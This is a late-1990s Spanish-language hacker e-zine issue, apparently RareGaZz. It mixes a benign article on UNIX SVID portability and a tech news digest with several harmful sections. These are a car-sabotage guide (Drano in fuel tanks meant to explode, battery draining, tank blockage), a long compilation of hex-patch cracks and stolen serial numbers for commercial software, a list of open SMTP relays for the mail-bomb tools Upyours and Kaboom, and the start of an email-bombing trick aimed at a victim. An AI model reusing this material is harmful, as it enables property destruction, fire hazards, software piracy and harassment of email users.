∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ --------------------------------------------------------------------- -----------UNIX SISTEM V Interface Definition (SVID).---------------- --------------------Por 12r43l Overdrive----------------------------- ----------------------arcanos@mail.org------------------------------- Pocas veces nosostros al programar alguna cosa nos preocupamos por como se va ha comportar nuestro programa en otras maquinas debido a esto muchas veces nos llevamos la sorpresa de que una aplicacion robusta no corre en alguna maquina con el mismo sistema operativo (SO) Aun mas, con la gran variedad de sabores de UNIX y por la importancia de este SO para el hacking, es de gran utilidad saber como se va a comportar nuestro programa en UNIX asi sea AT&T SISTEM V, SUN OS, IRIX, HP-UX, AIX 6000, LINUX etc... Por eso me he propuesto escribir una serie de articulos que nos pueden ayudar a esto.Agradeceria cualquier comentario acerca de estos articulos, aqui vamos!. ---INTRODUCCION--- ¿SVID? SVID especifica el ambiente del sistema operativo que permite crear aplicaciones de software que son independientes de plataformas de hardware. El SVID se aplica en el rango de computadoras personales a mainframes. El SVID especifica los componentes del sistema operativo disponibles para desarrollo de programas, define la funcionalidad de los componentes pero no la implementacion de estos. El SVID especifica la interfaz entre el codigo fuente y cada componente del sistema operativo, asi como el comportamiento a la hora de correr. Lo mas importante es la definicion de un ambiente comun para la aplicacion de software y el usuario final. Cualquier aplicacion escrita usando solamente componentes definidos en el SVID debe ser compatible y portable en cualquier computadora que soporte el "System V Interface" (SVI).El codigo fuente puede ser re-compilado para mover una aplicacion a una nueva computadora que soporte el SVI, la presencia y el comportamiento de este y sus componentes es definido por el SVID. El SVID esta organizado en el Base System Definition y en una serie de Definicion de Extensiones. El Base System Definition especifica los componentes que todo sistema operativo basado en el System V debe proveer. Las Extensiones del Base System son opcionales en los sistemas operativos basados en el System V pero cuando un componente esta presente y ocupa de estas extenciones, es recomendable especificarlo. El SVID provee a los desarolladores y a usuarios finales de las caracteristicas y funciones disponibles para cada uno de ellos en cualquier sistema operativo basado en el System V. El SVID esta basado en el POSIX 1003.1-1988 Full Use Standard,X3.159-1989 (ANSI C), y en ISO/IEC 9899-1990 (ISO C). ¿Quien usa el SVID? Por lo general lo usan desarrodaroes de aplicaciones para UNIX y busca que estas sean portables entre sistemas operativos basados en el SYSTEM V (Hacking? genial! no?). 1.- Base System. La funcionalidad del Base System ha sido estructurada para proveer un ambiente standard de ejecucion para programas escritos en un lenguaje de alto nivel como C. Esto con la finalidad de que al migrar una aplicacion a un SO en otra plataforma solo se añadan las extensiones del Base System si es que son requeridas. 2.- Extensiones del Base System. Estas extenciones han sido construidas para hacer disponible un camino robusto para incrementar funcionalidades al SO y asi generar aplicaiones mas complejas. Dependiendo de la complejidad de nuestra aplicacion es como vamos a requerir estas extensiones. Por el momento es suficiente recomiendo analizar e investigar mas al respecto ya que un poco mas de info no hace daño ;-) Fuente: SYSTEM V INTERFACE DEFINITION. Third edition. UNIX SYSTEM LABORATORIES. Z80Z80Z80Z80Z80Z80Z80Z80Z80 Z80.12r43lOverdrive1997.Z80 Z80Z80Z80Z80Z80Z80Z80Z80Z80 °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ LA GUIA PARA JODER CUALQUIER AUTOMOVIL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MUCHO DAÑO ~~~~~~~~~~ o Toma un frasco de medicina controlada (los botecitos de plastico cafe) y llenalo de Drano (destapa-caños). Echalo al tanque de gasolina y retirate. El drano liquido se comera el frasco y BOOM! Primero intenta con varios frascos y elige el que tarde mas en quemarse DAÑO MEDIO ~~~~~~~~~~ o Agarra una pieza pequeña de aluminio y pegalo entre el encendedor y el filamento creando una union. Despues, si el carro esta prendido o no, el encendedor vaciara la bateria. La bateria del carro morira misteriosamente y cuando le pase energia, en dos o tres dias volvera a morir :-) o Coloca un poco de mierda de gato fresca y ponla en el techo o cofre del carro en un dia soleado y los acidos se comeran el metal! o Toma una pelota de ping-pong y ponla en el tanque de gas. Despues, cuando maneje unas 5 o 10 millas, la pelota tapara el tanque y el carro se detendra como si le faltara gasolina. La victima llenara el tanque y el carro funcionara de nuevo... unas 5 millas mas. >;-) o Toma unas 12 o 15 pelotitas de esas para evitar la humedad en cajas o cajones y ponlas en el tanque de gas. Esto hara que el nivel de octano en la gasolina sea altisimo lo que hara que el motor no pueda pararse. DAÑO MENOR ~~~~~~~~~~ o Pon grasa sucia por todo el mofle. Cuando el mofle se caliente empezara a levantar humo negro. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ______________________ / /_______________________ / CRACKS - HACKS Y KAOS CON UN HEXEDITOR /\ /____________________ / / \___________________/ <<::RareGaZz::>> / / /________________________/ / \________________________\/ En este texto les presentamos una manera rapida y sencilla de registrar sus programas favoritos. Antes de modificar un archivo con un editor tienes que hacer un respaldo no vaya ser que la jodas y bueno, te quedes sin nada :-) Un editor hexadecimal (Hedit) viene incluido en RareGaZz #2 Como crackear 3D Studio release 4 con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remueve la defensa harlock 3DS.EXE 0005ACD8: 3D B8 0005ACDD: 74 EB 0006D282: 56 B8 0006D283: 68 B2 0006D284: C8 AA 0006D285: 27 FE 0006D286: 03 5B 0006D287: 00 C3 000874B9: 3D B8 000874BE: 74 EB 0008C0B1: 3D B8 0008C0B6: 74 EB 001041A2: 75 90 001041A3: 12 90 0011F84A: 56 B8 0011F84B: 68 4A 0011F84C: C8 52 0011F84D: 27 50 0011F84E: 03 7A 0011F84F: 00 C3 00126C92: 56 B8 00126C93: 68 9E 00126C94: 68 28 00126C95: A3 83 00126C96: 02 45 00126C97: 00 C3 00182B8A: 56 B8 00182B8B: 68 82 00182B8C: 64 26 00182B8D: 68 98 00182B8E: 07 30 00182B8F: 00 C3 Aldas (dcx@pub.osf.lt) = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear 4-D Boxin con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Encuentra la siguiente linea en el archivo 4DBMCGA.EXE 32 B8 05 46 Conviertela a: 32 B8 05 0A EE 03 E1 05 FD 07 01 08 11 0A 20 0C 31 0E 00 1C 50 00 Conviertela a: D1 03 E0 05 F4 07 00 08 10 0A 27 0C 30 2F 00 1C 50 00 Cuando veas la cara de un boxer, presiona enter 2 veces. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear 4OS/2 v.2.51 build 43 (32 bits) con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Encuentra lo siguiente en el archivo 4os2.exe (219.040 bytes) 8B 5D E8 83 FB 06 77 25 Conviertelo a: BB 00 00 00 00 90 90 90 cracked by: Dark Wing = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear Accolade Software con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Funciona con: 4th& Inches, Test Drive, Fast Break, y otro Accolade software. Encuentra: 55 56 57 06 1E cambia a: 31 C0 C3 06 1E = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear Adept BBS v1.07 para OS/2: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Crea un archivo llamado: adeptbbs.reg Pon la siguiente informacion dentro de el: Name: (20 espacios) Creeping Death Rego No. (17 espacios) 3599887846 Rego Serial No. (10 espacios) 806949176 Los espacios son importantes para que funcione el crack. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear ANSIPLUS v.3.02 con un Hex-editor. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Encuentra lo siguiente en el archivo ANSIPLUS.SYS Busca: 56 33 DB 3E 39 82 Convierte a: 56 33 DB 3E 8B 82 Busca: 6C 00 81 C3 A4 00 Convierte a: 6C 00 81 C3 00 00 Busca: F4 63 97 65 E2 65 39 66 97 65 Convierte a: F4 63 97 65 E7 66 E7 66 E7 66 Por: Johnny Crack = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Para hacer que ARJ v2.30 Secure haga chequeos AV haz esto: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cambia los siguientes bytes en arj.exe Cambia 3530 de 75/05 a EB/0D Cambia 4568 de 75/06 a EB/0C Cambia 6555 de 75/06 a EB/0C Y el seguro de ARJ funcionara! Agarra un archivo ARJ ya hecho. Escribe : ARJ z FILE.ARJ AV (nombre) Las direcciones de los bytes estan en DECIMAL !. Solo funciona con Arj v2.30 = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como registrar BackAlley con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Archivo : BACKALLY.EXE Busca : A0 40 04 Cambia a : B0 01 90 Por: Krynos = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear BAChurch con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Archivo : BACHURCH.EXE Busca : A0 30 04 Cambia a : B0 01 90 Por: Krynos = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear Buttons 4 Dos 6.0: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Abre un editor de textos (MS-Edit) 2. Abre el archivo Buttons.ini 3. Veras esta linea: ".. Register Y " Limpia Register y pon tu nombre. Ejemplo: ".. RareGaZz Y " Salva el archivo. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear CD-Maker Pro v.1.2 para Windows(95) con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CDMAKER.exe BD14B 74 --> EB BD14C 03 --> 3B CDCOPY.exe 0B01F 04 --> 00 1965F 75 --> EB = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = CD MASTER 3.1 ~~~~~~~~~~~~~ Crea un archivo de nombre CDPLAYER.REG y con un Hex-Editor pon estos comandos: 4F 4B 57 41 52 45 0D 0A 35 34 43 03 0D 0A = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear Cool Edit «v1.51: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ En la pantalla de registro escribe tu nombre y pon como numero de serie _ ANSWERME _. Cool Edit te dira que numero de serie es. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Registro para Cooledit para Windows 95. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copia el archivo cool.ini a tu directorio de windows y edita: [Registration] Garbleflux=5397 User=The Free Debugger / Dementia Number=DEMENTIA = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear Dbase v4.11 con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Archivo : INSTALL.EXE Busca : 74 1A FF 46 FE Cambia a : EB 1A FF 46 FE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear GifLite v2.0 con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Archivo : Giflite.exe Busca : C6 06 F3 00 01 C4 Cambia a : C6 06 F3 00 00 C4 = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear GRAPHIC WORKSHOP 6.1u para DoS: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Archivo : GWSINSTL.EXE Busca : 83 C4 04 3B 06 D0 18 74 IF Cambia a : 83 C4 04 90 A1 D0 18 75 IF Archivo : GWS.EXE Busca : 83 C4 04 3B 06 58 03 75 2C Cambia a : 83 C4 04 90 A1 58 03 74 2C = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear LORDTRX v1.10 con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Encuentra lo siguiente en LORDTRX.EXE: 0B C0 75 08 C7 06 Cambialo a: 31 C0 75 08 C7 06 = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = NEOPAINT 1.0 ~~~~~~~~~~~~ Archivo : NEOPAINT.EXE Busca : 80 3E 06 07 00 Cambia a : C6 06 3E 06 01 = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear Paint Shop Pro v3.0 con un Hex-Editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Busca en PSP.EXE lo siguiente: 83 C4 02 0B C0 74 0D Cambialo a: 88 26 86 00 90 EB 2D = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear The Draw con un Hex-editor: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Archivo : TheDraw.exe Busca : 08 C0 74 C2 89 EC 5D CA Cambia a : 08 C0 75 C2 89 EC 5D CA = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Como crackear WebEdit v1.4b para Win95 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Busca en el directorio System de windows el archivo Sysdvrxl.drv y cambiale el nombre a cualquier cosa. Listo! = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = CoolEdit96 Codigos de registro Name: tHATDUDE PC96 Code: HFCMGACK Name: tHATDUDE PC97 Code: GGRGEGSI Name: PhRoZeN CReW 97 Code: SIYVBHZE Name: PhRoZeN CReW Code: MPULQSZB = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = ---> Cracks recopilados de internet. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ ┌┐┌ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬ ┌─┐ ┌─┐ ┌┐┌ ┬ ┬ ┌─┐ ┌─┐ │││ ├─ │││ ┌─┘ └┬┘ │ │ │ │ │ ├─┤ │││ │ │ └─┐ ├─ ┴└┘ └── └┴┘ └─┘ ┴ └─┘ └─┘ └── ┴ ┴ ┴└┘ └─┘ └─┘ └── By: Groovy Dooby. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ America Online firmo con Cybermeals (comidas ciberneticas), y para abril espera que mas de 25,000 restaurantes puedan entregar comidas ordenadas por internet. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ En la batalla contre el spam (email no solicitado) con America Online, la Organizacion de Comercio en Internet (http://www.noic.org/) dice que pondra en internet 5 millones de direcciones de email de los usuarios de AOL. America Online llama a eso cyber-terrorismo. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Hotmail dice tener 9.2 millones de usuarios activos y dicen que pueden pasar a America Online (AOL con 10 millones) como numero 1. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Microsoft Corp. compro al proveedor de email gratuito Hotmail. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Hackers haciendose llamar PANTS/HAGIS entraron al sistema de Yahoo, el sitio mas popular de internet, poniendo una nota para la liberacion del Hacker Kevin Mitnick y diciendo que cualquier persona que haya usado Yahoo desde una terminal de red en el mes pasado tiene una bomba logica en su red. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ La primer maquina de busqueda amigable con la familia esta en internet. Net Shepherd http://family.netshepherd.com/ utilizando AltaVista, dice haber `clasificado' un millon y medio de paginas de 500,000 sitios web. No busca material no adecuado para la familia y varia en grados que puedes especificar mientras buscas. La Fundacion de Libertad Electronica ya la ha atacado. http://www2.epic.org/reports/filter_report.html '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ El regalo de ahora: Cosmopolitan's Virtual Makeover CDROM ($40) es un paquete que te permite scannear tu foto y cambiarle el estido de peinado, makeup, pestañas,etc. Todo en la privacidad del hogar. http://www.virtualmakeover.com '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ IDT Corp. Finalmente saco al mercado Net2Phone Direct, un servicio para hacer llamadas por internet a cualquier telefono regular por 8 centavos el minuto. Intentalo en 1-800-CALL-IDT http://www.net2phone.com/ '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ La conferencia de la Organizacion de las Naciones Unidas sobre el calentamiento de la tierra sera la mayor transmision por internet. Se usaran 16 servidores y mirror sites para mostrar los discursos oficiales y otros eventos en 7 lenguajes. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ La maquina de busqueda Lycos se convirtio en la primera maquina de busqueda que empezo a insertar algunas de sus propias paginas como los primeros resultados. Otras maquinas lo hacen, pero siempre en los lados. www.lycos.com '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ El controversial filtro de pornografia CyberPatrol esta de nuevo en las noticias con la salida de un reporte sobre los sitios bloqueados, incluyendo Air Penny (un sitio de Nike), un servicio de atencion a mascotas, El sitio de MIT's sobre el proyecto matematico, 90,000 sitios de musica en Geocities, WordPlay (antes AT&T's Imagination Network), etc. etc. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ IBM definitivamente se sale de el gran show en las Vegas COMDEX '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ China sigue poniendo restricciones para el uso de Internet '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ WebTV al parecer llega a Ensenada, Mexicali y Tijuana Baja California Mexico. Tel. Ensenada: 738556 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ El pleito entre Microsoft contra el Departamento de Justicia termino. La compañia de software y el Gobierno han puesto sus papeles en linea. http://www.microsoft.com/corpinfo/doj/doj.htm http://www.usdoj.gov/atr/cases3/micros2/micros0.htm '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Los problemas del año 2000 estan apareciendo. Visa reporta que, a pesar de un tremendo esfuerzo empezado en 1996, 42,000 de los 14 millones de establecimientos que aceptan su tarjeta piensan que el año de caducidad 00 ya expiro y no aceptan las tarjetas. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Yahoo! lanzara con America Online (AOL) `Yahoo Online' con MCI, mandando por correo CDs, etc. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ (Tomada del diario El Colombiano, Medellin 25-I-98) Netscape Communications, la empresa lider de programas para Internet, distribuira gratuitamente de ahora en adelante su programa de navegacion en Internet, anuncio su presidente y director general, Jim Barksdale. Netscape imita asi a su principal rival, el gigante Microsoft, que avanzo peligrosamente en parte del mercado. La sociedad de Mountain View(California) tambien hara publica la tecnologia de la proxima generacion de su serie de programas para Internet, Communicator 5.0, indico Barksdale. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Por amenazas de muerte AMNISTIA INTERNACIONAL se va de Colombia (amenazas de las fuerzas militares Colombianas obviamente). Un informe de A.I. la semana pasada acuso a las F.F.M.M. Colombianas de masacres campesinas y violacion de derechos humanos!! (Que fueron negadas por los Militares). [ En el mundo no solo hay un Chiapas... :'( ] '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Toshiba impacto al mercado de las laptop con el primer diseño de costo menor a los $2,000 dlls. La Satellite 305CDS, con 16 MB RAM y procesador a 166MHZ con modem K56flex, se vende a $1,700. El precio de las laptop se espera que baje mas alla de los $1,500 dlls para este verano. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ El primer virus de hoja de calculo ha aparecido en Francia. El virus "paix.a virus" es transmitido en las formulas de las hojas de calculo de Excel. No es un virus que dependa en macros como los anteriores. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ En 1997, por la primera vez, NT se vendio mas que UNIX, y por lo doble. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ http://www.egghead.com/ Egghead Software cerrara sus puertas y tratara de vender unicamente en i-net. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ Mexico ha montado monstruosas Banderas de 164 por 94 pies colgadas de gigantescos postes de 109 toneladas como del tamaño de tres campos de football de altura en tres lugares directamente en la frontera con los Estados Unidos Americanos por El Paso, San Diego y Loredo TX. Ninguna de las ciudades de Estados Unidos puede justificar el costo de un proyecto de esa magnitud para su bandera. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ http://www.safersmokes.com/ Para aquellos delicados al tabaco, los cigarros "Bravo" de lechuga son mucho mas seguros. De venta en internet a $3.75 dlls. el paquete. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ http://www.aidem.com.sg/madonna/frozen.htm Warner Brothers esta enojado por que "Frozen" un single del album aun sin salir "Ray of Light" ya esta en internet. '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\ °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ .o B 0 0 /\/\ 3 R 4 N G o. `tu linea de comunicacion con el under.' *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ CODIGO DE REGISTRO mIRC ver 5.02 name: mIRC Supporter S/N: 17394-1986741 *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Servidores SMPT para usar con programas como Upyours y Kaboom. (algunos de ellos no imprimen la I.P.) rome.ccomm.com wisdom.psinet.net.au emout17.mail.aol.com mdr.de manado.webindonesia.com <------ Bueno. emout29.mail.aol.com from m16.boston.juno.com eleventh2.inil.com <------ Muy rapido. portland.cbn.net.id pnccwg.palaunet.com bonn.netsurf.de server.compunort.com.ar mail1-gui.server.virgin.net nontri.ku.ac.th mail2.isdnet.net gandalf.leader.es smtp-0.indo.net.id sirius.hkstar.com triton.worldonline.nl brickbat8.mindspring.com ieva06.lanet.lv www.aiusa.com brick.purchase.edu rush.u-netsys.com.br sweden.it.earthlink.net SWBELL.net elf.ecitele.com future.futureone.com dinet.de enterprise.powerup.com.au ns.ezl.com zenon.logos.cy.net dino.mainz.ibm.de out2.ibm.net smtp1.wanadoo.fr beta.mcit.com hp1.p-ol.com revere.musc.edu alpha.ntu.ac.sg mail.uniserve.com UTMJB.UTM.MY mimos.my deneb.dfn.de nontri.ku.ac.th weblock.tm.net.my mail.secc.cc.ia.us main.com2com.ru mail.ptd.net lilly.ping.de smtp1.erols.com crotalus.famu.edu mail.uniserve.com *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Saludos esta es una pequeña manera de optimizar su sistema Win95: -En el Panel de Control (Control Panel) selecciona el icono del sistema (System) y clickea en Rendimiento (Performance). Luego abre el menu de Configuracion de Archivos (File Settings) y en el menu desplegable elige la opcion "Network Server". Si tienes un CD-ROM de 8x o mas rapido en las opciones del CD-ROM indicale que quieres un cache pequeño (small) y en el menu desplegable deberas elegir "No lectura adelantada" (No read-ahead) Para acelerar el modem un poco mas para surfear por Internet en el control panel clikea el icono de "modems". Luego presiona el boton Propiedades (Properties). Pon como maximo de velocidad la maxima velocidad disponible - aunque tu modem sea mas lento - y clickea "Conexion" (Connection) y despues haz click en el boton izquierdo Configuracion del Puerto (Port Settings), marca la unica cajita y pon al maximo la primer opcion y al minimo la ultima. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Algo de poesia 100% mexicana............ Apasionado y hondamente la quiero a usted jo- ven hermosa, como es natural yo deseo proce- der con toda prontitud y eficacia al fin de pre- sentarla luego en el altar de la iglesia y no enga- ñarla vilmente, pues pienso que es usted es la mas pu- ra, el modelo envidiable de mujer buena y cas- ta que pueda haber existido. Asimismo, deseo depositar en usted, todo el se- creto de mi alma e impedir que mis venas se que- men con ardiente pasion y despues de haber for- malizado nuestras relaciones y haberle comu- nicado a su madrecita y hermanitas; quedaria mi ver- dadera pasion correspondida al fin de que la ha- ga muy feliz ante tanta emocion. La verdad, le digo, que el mas afortunado cu- pido, mirandonos con tan ardiente anhe- lo, envidiaria nuestra dicha pues creame que el co- nocer la felicidad matrimonial que desea toda mu- jer es lo mas importante en la vida... Ahora lean solo las lineas impares. Saludos. Azumlord *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Cual es el tio que mas largo? El guardia civil pues nace en Andalucia y va a morir hasta el pais Vasco. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ De: Plaxius Para: Todos Feliz navidad y año nuevo a todos. Ha sido excelente conocerlos a todos los habitantes de internet, a todas las culturas, en fin. A todos! *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ ¿En verdad quieres joder a esa personita bombardeando su direccion de email? Pues manda un mensaje a: BITFTP@PUCC.PRINCETON.EDU Con esto en el cuerpo del mensaje: FTP ftp.cdrom.com 